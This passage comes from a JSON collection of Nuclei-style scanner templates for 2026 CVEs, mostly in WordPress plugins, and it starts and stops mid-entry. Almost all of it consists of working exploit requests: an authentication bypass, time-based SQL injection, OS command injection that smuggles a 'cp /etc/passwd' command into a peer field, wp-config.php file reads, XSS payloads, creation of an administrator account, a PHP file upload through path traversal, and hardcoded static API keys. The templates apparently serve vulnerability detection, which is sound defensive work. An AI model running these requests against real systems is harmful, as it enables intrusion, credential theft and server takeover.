http.html:\"/wp-content/plugins/profile-builder/\"\n    fofa-query: body=\"/wp-content/plugins/profile-builder/\"\n    publicwww-query: \"/wp-content/plugins/profile-builder/\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,profile-builder,auth-bypass,unauth,intrusive,vkev\n\nvariables:\n  username: \"{{rand_base(63,'abcdefghijklmnopqrstuvwxyz')}}\"\n  email: \"{{rand_base(10,'abcdefghijklmnopqrstuvwxyz')}}@{{rand_base(8,'abcdefghijklmnopqrstuvwxyz')}}.com\"\n  password: \"{{rand_base(12,'abcdefghijklmnopqrstuvwxyz0123456789')}}Aa1!\"\n\nflow: http(1) && http(2) && http(3) && http(4) && http(5)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/profile-builder/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Profile Builder\")'\n          - 'compare_versions(pb_version, \">= 3.16.4\", \"< 3.16.5\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: pb_version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable\\s+tag:\\s*([0-9.]+)'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/register/\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"wppb-register-user\")'\n          - 'len(wppb_nonce) > 0'\n          - 'len(form_name) > 0'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: form_name\n        part: body\n        group: 1\n        regex:\n          - 'name=\"form_name\"[^>]*value=\"([^\"]*)\"'\n        internal: true\n\n      - type: regex\n        name: wppb_nonce\n        part: body\n        group: 1\n        regex:\n          - 'name=\"register_[^\"]*_nonce_field\"[^>]*value=\"([^\"]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /register/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Referer: {{RootURL}}/register/\n        Origin: {{RootURL}}\n\n        username={{username}}&email={{email}}&passw1={{password}}&passw2={{password}}&action=register&form_name={{form_name}}&register_{{form_name}}_nonce_field={{wppb_nonce}}&register=Register&_wp_http_referer=%2Fregister%2F\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"autologin=true\")'\n          - 'len(autologin_nonce) > 0'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: autologin_nonce\n        part: body\n        group: 1\n        regex:\n          - 'autologin=true(?:&(?:#0?38|amp);)?_wpnonce=([a-f0-9]+)'\n        internal: true\n\n  - raw:\n      - |\n        GET /register/?autologin=true&_wpnonce={{autologin_nonce}} HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: false\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(tolower(all_headers), \"set-cookie: wordpress_logged_in_\")'\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-admin/options-general.php HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: false\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"name=\\\"blogname\\\"\")'\n          - 'contains(body, \"name=\\\"siteurl\\\"\")'\n        condition: and\n# digest: 4b0a004830460221008803a375b8dd4789fb2e0fcd449e579914c59ed0f8a110ef58d1748b8e1edae90221008d9cdf51b80f5034f9f5b99bf5cc2b639a4d0d3bd08dcb5f4e1adef7b79f76ee:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-15826.yaml","vuln_id":"cve-2026-15826"},{"raw":"id: CVE-2026-1581\n\ninfo:\n  name: wpForo Forum <= 2.4.14 - SQL Injection\n  author: Shivam Kamboj\n  severity: critical\n  description: |\n    wpForo Forum WordPress plugin <= 2.4.14 contains a time-based SQL injection caused by insufficient escaping of the 'wpfob' parameter, letting unauthenticated attackers extract sensitive database information.\n  impact: |\n    Unauthenticated attackers can extract sensitive information from the database, leading to data disclosure.\n  remediation: |\n    Update to the latest version of wpForo Forum plugin.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo/wpforo-forum-2414-unauthenticated-time-based-sql-injection\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1581\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-1581\n    epss-score: 0.01727\n    epss-percentile: 0.76551\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 1\n    publicwww-query: \"/wp-content/plugins/wpforo/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,sqli,wpforo,unauth,vkev\n\nhttp:\n  - raw:\n      - |\n        @timeout: 20s\n        GET /community/recent/?wpfob=(SELECT/**/1/**/FROM/**/(SELECT/**/SLEEP(8))a) HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration >= 8'\n          - 'status_code == 200'\n          - 'contains(body, \"wpforo-wrap\")'\n          - 'contains(content_type, \"text/html\")'\n        condition: and\n# digest: 4a0a00473045022100bd39d2dd39f0cc7a369e7052447839edf5f6050b5d9f5d4ec2435e326b09bd09022005af890d849fcd5affb91002d853dba3ae0e82c50f5a0dd3a1281275c7b16327:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-1581.yaml","vuln_id":"cve-2026-1581"},{"raw":"id: CVE-2026-15733\n\ninfo:\n  name: WGDashboard <= 4.3.2 - Authenticated OS Command Injection /etc/passwd Read\n  author: str4k3r,0x_Akoko\n  severity: critical\n  description: |\n    WGDashboard <= 4.2.3 contains a command injection caused by multiple OS command injection points, letting authenticated attackers execute arbitrary commands as root.\n  impact: |\n    Authenticated attackers can execute arbitrary commands as root, leading to full system compromise.\n  remediation: |\n    Update to the latest version beyond 4.2.3.\n  reference:\n    - https://github.com/Stuub/WGDashboard-v4.3.2-OS-Command-Injection-to-Root-RCE-PoC\n    - https://github.com/WGDashboard/WGDashboard\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-15733\n  classification:\n    cve-id: CVE-2026-15733\n    epss-score: 0.13545\n    epss-percentile: 0.96278\n    cwe-id: CWE-78\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n  metadata:\n    verified: true\n    max-request: 5\n    product: wgdashboard\n    vendor: wgdashboard\n  tags: cve,cve2026,wgdashboard,rce,cmdi,authenticated,intrusive\n\nvariables:\n  username: \"\"\n  password: \"\"\n  probe: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: http(1) && http(2) && http(3) && http(4) && http(5)\n\nhttp:\n  - raw:\n      - |\n        POST /api/authenticate HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"status\\\":true\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/getWireguardConfigurations HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'len(config_name) > 0'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: config_name\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - '\"Name\":\"([^\"]+)\"'\n\n  - raw:\n      - |\n        POST /api/addPeers/{{config_name}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"name\":\"probe-{{probe}}\",\"allowed_ips\":[],\"preshared_key_bulkAdd\":false}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'len(peer_id) > 0'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: peer_id\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - '\"id\":\"([^\"]+)\"'\n\n  - raw:\n      - |\n        POST /api/updatePeerSettings/{{config_name}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"id\":\"{{peer_id}}\",\"name\":\"probe-{{probe}}\",\"private_key\":\"\",\"DNS\":\"1.1.1.1\",\"allowed_ip\":\"10.253.253.253/32;cp${IFS}/etc/passwd${IFS}static/app/dist/{{probe}}.txt;\",\"endpoint_allowed_ip\":\"0.0.0.0/0\",\"preshared_key\":\"\",\"mtu\":1420,\"keepalive\":21,\"notes\":\"\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        internal: true\n\n  - raw:\n      - |\n        GET /static/app/dist/{{probe}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"root:\") && contains(body, \":/bin/\")'\n        condition: and\n# digest: 4b0a00483046022100fba98460cef72cd82536729ae08ec407147fc5e32029b89346da9d88f9b3ede2022100bf873f5e898aa73b814a80a34516debe3e8ea43b1f8d3761e726c06abeb797ee:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-15733.yaml","vuln_id":"cve-2026-15733"},{"raw":"id: CVE-2026-1557\n\ninfo:\n  name: WP Responsive Images <= 1.0 - Arbitrary File Read\n  author: Shivam Kamboj\n  severity: high\n  description: |\n    WP Responsive Images plugin for WordPress <= 1.0 contains a path traversal caused by improper sanitization of the 'src' parameter, letting unauthenticated attackers read arbitrary files on the server.\n  impact: |\n    nauthenticated attackers can read arbitrary files, potentially exposing sensitive information.\n  remediation: |\n    Update to the latest version of WP Responsive Images plugin.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-responsive-images/wp-responsive-images-10-unauthenticated-path-traversal-to-arbitrary-file-read-via-src\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1557\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-1557\n    epss-score: 0.01722\n    epss-percentile: 0.76491\n  metadata:\n    max-request: 1\n    verified: true\n  tags: cve,cve2026,wordpress,wp,wp-plugin,lfi,wp-responsive-images,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/wp-responsive-images/image_handler.php?src=/wp-config.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code==200 || status_code==403'\n          - 'contains_all(body, \"DB_NAME\", \"DB_PASSWORD\")'\n        condition: and\n# digest: 4a0a00473045022100e36e9402bcd53fc0c2b8dee402d99f7de7d72682d996fa6c267ed962ab98c285022052c3439017c0cc5d80cd13113c17ea0d01d15833e83cb29962e0f6ad30861b24:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-1557.yaml","vuln_id":"cve-2026-1557"},{"raw":"id: CVE-2026-15094\n\ninfo:\n  name: WP Hotel Booking <= 2.3.2 - Cross-Site Scripting\n  author: SmigsBellamigs\n  severity: medium\n  description: |\n    The WP Hotel Booking plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'check_in_date' parameter in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n  impact: |\n    Successful exploitation requires user interaction, but allows unauthenticated attackers to inject arbitrary JavaScript in the context of the victim's session, enabling session hijacking, phishing, or defacement.\n  remediation: |\n    Update the WP Hotel Booking plugin to version 2.3.3 or later.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/8139f512-7bc9-45ae-83d7-bf496e1ad56d\n    - https://wpscan.com/vulnerability/0e1602c9-8cf9-47b2-92bb-3ffd93dbe6f5\n    - https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.3.2/includes/TemplateHooks/ArchiveRoomTemplate.php#L262\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-15094\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-15094\n    cwe-id: CWE-79\n    epss-score: 0.00686\n    epss-percentile: 0.51231\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: thimpress\n    product: wp-hotel-booking\n    fofa-query: body=\"/wp-content/plugins/wp-hotel-booking/\"\n    publicwww-query: \"/wp-content/plugins/wp-hotel-booking/\"\n    tags: cve,cve2026,wordpress,wp-plugin,wp-hotel-booking,xss,unauth\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/wp-hotel-booking/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"WP Hotel Booking\")'\n          - 'compare_versions(version, \"<= 2.3.2\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        group: 1\n        internal: true\n        regex:\n          - 'Stable tag: ([\\d.]+)'\n\n  - raw:\n      - |\n        GET /wp-json/wp/v2/pages?per_page=100 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"container room-container\"\n        internal: true\n\n    extractors:\n      - type: json\n        name: room_path\n        internal: true\n        json:\n          - 'first(.[] | select(.content.rendered | contains(\"container room-container\")) | .link)'\n\n  - raw:\n      - |\n        GET {{room_path}}?check_in_date=%22autofocus%20onfocus%3D%22alert(document.domain) HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'value=\"\"autofocus onfocus=\"alert(document.domain)'\n          - 'hb_input_date_check'\n        condition: and\n# digest: 490a0046304402202aa0b25884d54c1ee1dc4e6c56511c884b0d9aa1cd704fd0f6abcb2692b6e11f02205fab58ece67508512db5836ce865d9586b03d0081cfb715302358b39795473c7:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-15094.yaml","vuln_id":"cve-2026-15094"},{"raw":"id: CVE-2026-1492\n\ninfo:\n  name: WordPress User Registration & Membership <= 5.1.2 - Unauthenticated Privilege Escalation\n  author: omarkurt\n  severity: critical\n  description: |\n    User Registration & Membership WordPress plugin <= 5.1.2 contains an improper privilege management vulnerability caused by accepting user-supplied roles without server-side allowlist enforcement, letting unauthenticated attackers create administrator accounts\n  impact: |\n    Unauthenticated attackers can create administrator accounts, leading to full system compromise.\n  remediation: |\n    Update to the latest version beyond 5.1.2.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1492\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7e9fec92-f471-4ce9-9138-1c58ad658da2\n    - https://plugins.trac.wordpress.org/changeset/3469042/user-registration\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cwe-id: CWE-269\n    cve-id: CVE-2026-1492\n    epss-score: 0.27989\n    epss-percentile: 0.98017\n  metadata:\n    max-request: 3\n    verified: true\n  tags: cve,cve2026,wordpress,wp-plugin,user-registration,privilege-escalation,vkev\n\nvariables:\n  username: \"{{to_lower(rand_base(8))}}\"\n  email: \"{{to_lower(rand_base(8))}}@wptest.com\"\n  password: \"Wp-{{rand_base(12)}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /registration/ HTTP/1.1\n        Host: {{Hostname}}\n        Accept: text/html,application/xhtml+xml\n\n    host-redirects: true\n    max-redirects: 2\n\n    extractors:\n      - type: regex\n        name: form_id\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'name=\"ur-user-form-id\" value=\"(\\d+)\"'\n\n      - type: regex\n        name: form_save_nonce\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '\"user_registration_form_data_save\"\\s*:\\s*\"([a-f0-9]+)\"'\n\n      - type: regex\n        name: ur_nonce\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'id=\"ur_frontend_form_nonce\" name=\"ur_frontend_form_nonce\" value=\"([a-f0-9]+)\"'\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        X-Requested-With: XMLHttpRequest\n\n        action=user_registration_user_form_submit&security={{form_save_nonce}}&ur_frontend_form_nonce={{ur_nonce}}&form_id={{form_id}}&form_data=%5B%7B%22field_name%22%3A%22user_login%22%2C%22value%22%3A%22{{username}}%22%7D%2C%7B%22field_name%22%3A%22user_email%22%2C%22value%22%3A%22{{email}}%22%7D%2C%7B%22field_name%22%3A%22user_pass%22%2C%22value%22%3A%22{{password}}%22%7D%2C%7B%22field_name%22%3A%22user_confirm_password%22%2C%22value%22%3A%22{{password}}%22%7D%5D\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        X-Requested-With: XMLHttpRequest\n\n        action=user_registration_membership_register_member&security=invalid&members_data=%7B%22membership%22%3A%221%22%2C%22payment_method%22%3A%22free%22%2C%22username%22%3A%22{{username}}%22%2C%22role%22%3A%22administrator%22%7D\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n\n    extractors:\n      - type: dsl\n        dsl:\n          - '\"Created admin: \" + username + \" / \" + password'\n        internal: true\n# digest: 4a0a004730450220313fb49b19b788b010b175699da21600c3c17da46986397dfd14e45769402afc022100ac0a76bf9a14c24e285bb13ea38aa79d969f964d98e3c5c26400c1f1cb7ac264:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-1492.yaml","vuln_id":"cve-2026-1492"},{"raw":"id: CVE-2026-14894\n\ninfo:\n  name: WordPress Super Forms <= 6.3.313 - Arbitrary File Upload\n  author: pdteam,0x_Akoko\n  severity: critical\n  description: |\n    Super Forms – Drag & Drop Form Builder WordPress plugin \\u003C= 6.3.313 contains an arbitrary file upload vulnerability caused by missing file type validation and lack of capability checks in submit_form nopriv AJAX handler, letting unauthenticated attackers upload executable files and achieve remote code execution, exploit requires no authentication due to nonce bypass.\n  impact: |\n    Unauthenticated attackers can upload executable files and execute arbitrary code remotely, potentially compromising the entire server.\n  remediation: |\n    Update to the latest version of Super Forms – Drag & Drop Form Builder plugin.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9c7fb16-efbb-41e9-be13-98e96c1e9100\n    - https://patchstack.com/database/wordpress/plugin/super-forms/vulnerability/wordpress-super-forms-drag-drop-form-builder-plugin-6-3-313-unauthenticated-arbitrary-file-upload-vulnerability\n    - https://github.com/shinthink/CVE-2026-14894\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-14894\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-14894\n    epss-score: 0.05265\n    epss-percentile: 0.92182\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: developer-developer\n    product: super-forms\n    framework: wordpress\n    fofa-query: body=\"wp-content/plugins/super-forms\"\n    shodan-query: http.html:\"wp-content/plugins/super-forms\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,file-upload,rce,intrusive,vkev\n\nvariables:\n  rand: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: word\n        words:\n          - \"/wp-content/themes\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: wptheme\n        group: 1\n        regex:\n          - 'wp-content/themes/([a-zA-Z0-9_-]+)/'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php?action=super_create_nonce HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=super_create_nonce\n\n    extractors:\n      - type: regex\n        part: body\n        name: sfnonce\n        regex:\n          - '([a-f0-9]{10,})'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php?action=super_submit_form HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        sf_nonce={{sfnonce}}&form_id=1&data=%7B%22sf_upload_field%22%3A%7B%22type%22%3A%22files%22%2C%22files%22%3A%5B%7B%22value%22%3A%22../../../../../themes/{{wptheme}}/{{rand}}.php%22%2C%22datauristring%22%3A%22data%3Aimage/png%3Bbase64%2CPD9waHAgZWNobyAnQ1ZFLTIwMjYtMTQ4OTQtc2ZyY2UnOyBkaWUoKTsgPz4%3D%22%2C%22name%22%3A%22{{rand}}.php%22%2C%22label%22%3A%22attachment%22%7D%5D%7D%7D\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 302'\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-content/themes/{{wptheme}}/{{rand}}.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"CVE-2026-14894-sfrce\")'\n        condition: and\n# digest: 4b0a0048304602210093e713c4bcfef92c7b9b6164e2fdf1bebcfdfa46b9fdf04e984c0bcb95368036022100a2acd9149e102cfc994a21d225f52ec7086fb79b5ec96e9fc6d0055b7085dc26:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-14894.yaml","vuln_id":"cve-2026-14894"},{"raw":"id: CVE-2026-14483\n\ninfo:\n  name: Realtyna Organic IDX/WPL <= 5.2.0 - Unauthenticated Arbitrary File Upload\n  author: str4k3r\n  severity: critical\n  description: |\n    Realtyna Organic IDX plugin + WPL Real Estate plugin for WordPress <= 5.2.0 contains an unrestricted file upload vulnerability caused by missing file type validation and static API credentials, letting unauthenticated attackers upload executable files and achieve remote code execution, exploit requires knowledge of static API credentials.\n  impact: |\n    Unauthenticated attackers can upload executable files, leading to remote code execution and full server compromise.\n  remediation: |\n    Update to a version later than 5.2.0 or apply patches that enforce proper file validation and unique API credentials.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-14483\n    - https://github.com/0xdak/CVE-2026-14483_exploit\n    - https://wordpress.org/plugins/real-estate-listing-realtyna-wpl/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-14483\n    epss-score: 0.03639\n    epss-percentile: 0.89048\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: realtyna\n    product: real-estate-listing-realtyna-wpl\n    shodan-query: http.html:\"real-estate-listing-realtyna-wpl\"\n    fofa-query: body=\"real-estate-listing-realtyna-wpl\"\n  tags: cve,cve2026,wordpress,wp-plugin,wpl,realtyna,file-upload,unauth,intrusive\n\nflow: http(1) && http(2)\n\nvariables:\n  probe_filename: \"image_CVE14483_{{rand_base(10)}}.txt\"\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/real-estate-listing-realtyna-wpl/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(body, \"WPL Real Estate\", \"Realtyna Organic IDX\", \"Organic IDX plugin\")'\n          - 'compare_versions(ver, \"<= 5.2.0\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: ver\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([0-9][0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /?wplformat=io&wplview=io&public_key=U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w&private_key=Eft76bdh0o2uyhJkbG3T&commands_directory=mobile_application&cmd=set_property&user_id=1&dformat=json HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----CVE14483Boundary\n\n        ------CVE14483Boundary\n        Content-Disposition: form-data; name=\"file[]\"; filename=\"{{probe_filename}}\"\n        Content-Type: text/plain\n\n        CVE14483_SAFE_MARKER\n        ------CVE14483Boundary--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"json\")'\n          - 'contains_all(body, \"\\\"result\\\"\", \"\\\"success\\\":true\")'\n        condition: and\n# digest: 4b0a00483046022100d57b7a4842a2130cc5da3ac16f45d121ad06a44f4f48a657b6a31f502a464957022100a499773ff5361d9521437934a024594ceeb150dc71f032013791ae21938149d5:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-14483.yaml","vuln_id":"cve-2026-14483"},{"raw":"id: CVE-2026-1405\n\ninfo:\n  name: WordPress Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload\n  author: pussycat0x\n  severity: critical\n  description: |\n    Slider Future WordPress plugin <= 1.0.5 contains an unrestricted file upload vulnerability caused by missing file type validation in 'slider_future_handle_image_upload', letting unauthenticated attackers upload arbitrary files, exploit requires no authentication.\n  remediation: |\n    Update to a version later than 1.0.5 or the latest available version.\n  impact:\n    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-1405\n    epss-score: 0.03177\n    epss-percentile: 0.8748\n    cwe-id: CWE-434\n  tags: cve,cve2026,wordpress,wp-plugin,slider-future,file-upload,rce,oast,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /wp-json/slider-future/v1/upload-image/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"image_url\":\"http://{{interactsh-url}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"http\") || contains(interactsh_protocol, \"dns\")'\n          - 'status_code == 200'\n          - 'contains(content_type,\"application/json\")'\n          - 'contains_all(body,\"url\",\"wp-content\")'\n        condition: and\n# digest: 4a0a00473045022100e9e6a8343a35b541d6dade16da1cab9884b493d4463dcaeef18c233f30c4b435022075fcd0ff0b531134d1bf11c8bbed777d1251136fe2177f3531aa12046d8f7b65:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-1405.yaml","vuln_id":"cve-2026-1405"},{"raw":"id: CVE-2026-13731\n\ninfo:\n  name: WPBot <= 8.4.9 - Cross-Site Scripting\n  author: 0x_Akoko\n  severity: high\n  description: |\n    WPBot <= 8.4.9 is vulnerable to stored cross-site scripting via the conversation parameter in the qcld_wb_chatbot_conversation_save AJAX action. The AJAX nonce (qcsecretbotnonceval123qc) is publicly emitted on every frontend page via wp_localize_script under the ajax_nonce key, making it freely obtainable by unauthenticated visitors. The conversation parameter is saved to the database without sanitization and rendered unsanitized in the admin chat session view, causing stored XSS that executes when an administrator views saved chat sessions.\n  impact: |\n    Unauthenticated attackers can inject arbitrary JavaScript into the admin chat sessions view, enabling session hijacking, admin credential theft, or further site compromise.\n  remediation: |\n    Update WPBot to version 8.5.0 or later.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/124f2b72-d8da-46ba-844f-e9cc01441702\n    - https://plugins.trac.wordpress.org/browser/chatbot/tags/8.4.9/includes/chat-sessions/wpbot-chat-sessions.php#L509\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n    cvss-score: 7.2\n    cve-id: CVE-2026-13731\n    epss-score: 0.00889\n    epss-percentile: 0.57813\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: quantumcloud\n    product: chatbot\n    fofa-query: body=\"wp_chatbot_obj\"\n    shodan-query: http.html:\"wp_chatbot_obj\"\n    tags: cve,cve2026,wordpress,wp-plugin,wpbot,chatbot,xss,stored,unauth,vkev\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/chatbot/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"WPBot\")'\n          - 'compare_versions(lsversion, \">=1.0.0\", \"<=8.4.9\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: lsversion\n        internal: true\n        regex:\n          - 'Stable tag: ([\\d.]+)'\n        group: 1\n\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"ajax_nonce\")'\n          - 'contains(body, \"wp_chatbot_obj\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: ajax_nonce\n        internal: true\n        regex:\n          - '\"ajax_nonce\"\\s*:\\s*\"([^\"]+)\"'\n        group: 1\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        